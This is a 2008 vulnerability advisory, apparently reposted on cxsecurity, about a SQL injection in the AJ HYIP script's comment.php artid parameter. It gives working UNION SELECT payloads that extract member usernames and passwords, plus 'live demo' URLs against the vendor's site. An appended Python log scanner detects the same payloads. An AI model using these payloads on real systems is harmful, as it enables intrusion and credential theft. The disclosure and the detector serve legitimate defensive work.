AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability

2008.09.14
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

proud to be muslim

rEm0te sql injection VulnErability (ajhyip manager script)

AuTh0r      : security fears team
Home        : WwW.alsonaa.com
members     : HeB4RieH , germaya_x
Script Name : ajhyip
download    : http://www.ajhyip.com/
Email       : s-fteam@securityfears.cc
d0rk        :: "use your mind"

(you can log to control panel from http://site.com login.php)

-(:: sql Code ::)-

comment.php?artid=(sql)
(sql)=5+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9+from+members/*

-(:: l!ve demo ::)-

http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*
http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*

-(:: !GreTzZ! ::)-

SnIpEr.KiLLeR :: fa6al error :: black cheetah :: members of alsonaa.com :: str0ke :: MusliMs HaCkErs
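As an added, defender-side example (not part of the advisory and not the ajhyip script's own code): a small Python scanner that pulls the artid parameter out of Apache-style access log lines for comment.php and flags any value that is not a plain integer, which is also the input check the script should have enforced before using artid in a query. The log lines, addresses and paths below are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access log lines (Apache common format), not from the page.
# Lines 2 and 3 carry the UNION SELECT shape the advisory describes, line 4 a
# quote-breaking probe, lines 1 and 5 are benign requests with numeric ids.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Sep/2008:10:01:02 +0000] "GET /article/comment.php?artid=5 HTTP/1.1" 200 4120
203.0.113.9 - - [14/Sep/2008:10:01:09 +0000] "GET /article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/* HTTP/1.1" 200 4311
203.0.113.9 - - [14/Sep/2008:10:01:15 +0000] "GET /article/comment.php?artid=5%20UNION%20SELECT%201,2,3,4,5,6,7,8,9%20FROM%20members%2F%2A HTTP/1.1" 200 4311
203.0.113.9 - - [14/Sep/2008:10:01:20 +0000] "GET /article/comment.php?artid=-1%27 HTTP/1.1" 500 512
198.51.100.4 - - [14/Sep/2008:10:02:00 +0000] "GET /article/comment.php?artid=12 HTTP/1.1" 200 4099
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
ID_RE = re.compile(r'^[0-9]{1,10}$')
UNION_RE = re.compile(r'\bunion\b\s+(all\s+)?select\b')

def is_valid_artid(value: str) -> bool:
    """The input check comment.php should enforce: artid is a plain integer."""
    return bool(ID_RE.match(value))

def classify_artid(value: str) -> str:
    """Return 'ok', 'union' (UNION-based injection shape) or 'malformed'."""
    # Decode once more to catch double-encoded values; harmless on plain text.
    decoded = unquote_plus(value).lower()
    if is_valid_artid(decoded):
        return 'ok'
    if UNION_RE.search(decoded):
        return 'union'
    return 'malformed'

def scan_log(text: str) -> list:
    """Return one finding per comment.php request whose artid fails the check."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        if not url.path.endswith('/comment.php'):
            continue
        # parse_qs percent-decodes the value and turns '+' into spaces
        for artid in parse_qs(url.query, keep_blank_values=True).get('artid', []):
            verdict = classify_artid(artid)
            if verdict != 'ok':
                findings.append({'ip': m['ip'], 'status': m['status'], 'verdict': verdict, 'artid': artid})
    return findings
```

Running scan_log over the constructed sample yields three findings, all from the same client: two UNION-shaped values and one malformed id, while the two numeric requests pass.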

References:

http://xforce.iss.net/xforce/xfdb/44803
http://www.securityfocus.com/bid/30974
http://www.milw0rm.com/exploits/6350



Copyright 2017, cxsecurity.com
